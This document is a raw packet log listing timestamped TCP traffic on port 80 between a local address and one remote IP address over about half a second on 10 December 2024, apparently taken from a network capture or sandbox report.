                                                                          Dec 10, 2024 13:52:56.911667109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.913845062 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.913964033 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.914005995 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.916198969 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.916245937 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.916253090 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.916290045 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.927097082 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.927129030 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.927149057 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.927170038 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.927870989 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.927966118 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.928009987 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.930170059 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.930224895 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.930280924 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.932499886 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.932554007 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.932583094 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.932624102 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.934900045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.934978008 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.935030937 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.937170029 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.937223911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.937256098 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.937309027 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.939554930 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.939713955 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.939762115 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.941931963 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.942007065 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.942063093 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.944473982 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.944592953 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.944641113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.946671009 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.946800947 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.946872950 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.948995113 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.949042082 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.949115038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.949691057 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.951365948 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.951416969 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.951519966 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.953691006 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.953731060 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.953773022 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.953824043 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.953881979 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.956118107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.956223011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.956269979 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.958425045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.958565950 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.958614111 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.960818052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.960866928 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.961010933 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.961688042 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.963162899 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.963212013 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.963262081 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.963310957 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.965562105 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.965670109 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.965684891 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.965702057 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.967880011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.967986107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.968040943 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.970303059 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.970402002 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.970451117 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.972647905 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.972695112 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.080279112 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.080316067 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.080341101 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.080357075 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.081310987 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.081387997 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.081449032 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.083148956 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.083235979 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.083297968 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.085583925 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.085686922 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.085721016 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.085757971 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.087846041 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.087892056 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.087960958 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.087999105 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.090244055 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.090292931 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.090302944 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.090329885 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.092566013 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.092617989 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.092698097 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.092906952 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.094614983 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.094722986 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.094782114 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.096604109 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.096694946 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.096751928 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.098759890 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.098828077 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.098865032 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.099085093 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.100605011 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.100660086 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.100697041 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.100735903 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.102545023 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.102639914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.102689981 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.104629993 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.104664087 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.104682922 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.104695082 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.107151985 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.107214928 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.107242107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.107279062 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.108614922 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.108664036 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.108692884 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.108793974 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.110510111 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.110594988 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.110641956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.112498045 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.112559080 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.112623930 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.112695932 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.114504099 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.114521027 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.114552021 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.114578962 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.116528988 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.116630077 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.116687059 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.118489027 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.118524075 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.118571997 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.120471001 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.120522976 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.120554924 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.120594025 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.122473955 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.122543097 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.122565031 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.122581959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.124476910 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.124528885 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.124619007 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.124701977 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.126449108 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.126529932 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.126584053 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.128421068 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.128472090 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.128544092 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.128581047 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.130379915 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.130439997 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.130492926 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.130569935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.132476091 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.132527113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.132797956 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.133058071 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.134393930 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.134442091 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.134486914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.134537935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.136409044 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.136490107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.136514902 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.136524916 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.138417006 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.138498068 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.138554096 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.140351057 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.140409946 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.140438080 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.140476942 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.142437935 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.142482996 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.142528057 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.142560959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.144373894 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.144442081 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.144511938 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.144550085 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.146358013 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.146411896 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.146454096 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.146492004 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.148379087 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.148425102 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.148544073 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.148580074 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.150779963 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.150872946 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.150914907 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.152415991 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.152519941 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.152565956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.154323101 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.154370070 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.154403925 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.154459000 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.156280994 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.156338930 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.156384945 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.156596899 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.158277035 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.158457994 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.158525944 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.160434961 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.160490990 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.160505056 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.160573006 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.162338018 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.162399054 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.162409067 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.162434101 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.164294958 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.164347887 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.164383888 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.164459944 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.166301012 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.166400909 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.166470051 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.168311119 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.168369055 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.168390989 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.168431997 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.170301914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.170341969 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.170371056 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.170404911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.172247887 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.172292948 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.172339916 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.172528028 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.174293995 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.174335003 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.174482107 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.174562931 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.176263094 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.176373959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.176384926 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.176418066 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.178260088 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.178333044 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.178388119 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.180197954 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.180279970 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.180296898 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.180692911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.182220936 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.182260036 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.182323933 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.182358027 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.184190989 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.184237957 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.184252977 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.184289932 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.186171055 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.186211109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.272274971 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.272336960 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.272397995 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.272959948 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.273001909 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.273020029 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.273055077 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.274660110 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.274760008 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.274799109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.276403904 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.276432037 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.276443958 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.276473999 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.278584957 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.278600931 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.278645039 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.280021906 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.280073881 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.280158043 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.280201912 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.281716108 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.281730890 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.281769991 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.283144951 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.283186913 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.283253908 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.283288956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.284929991 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.284955978 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.284969091 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.285662889 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.286350012 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.286386967 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.286457062 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.286492109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.287955046 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.287992954 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.288055897 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.288090944 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.289571047 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.289637089 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.289789915 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.291276932 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.291321993 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.291398048 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.291436911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.292738914 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.292781115 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.292807102 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.292841911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.294406891 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.294578075 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:57.294617891 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:57.295968056 CET8049922212.162.149.89192.168.2.5
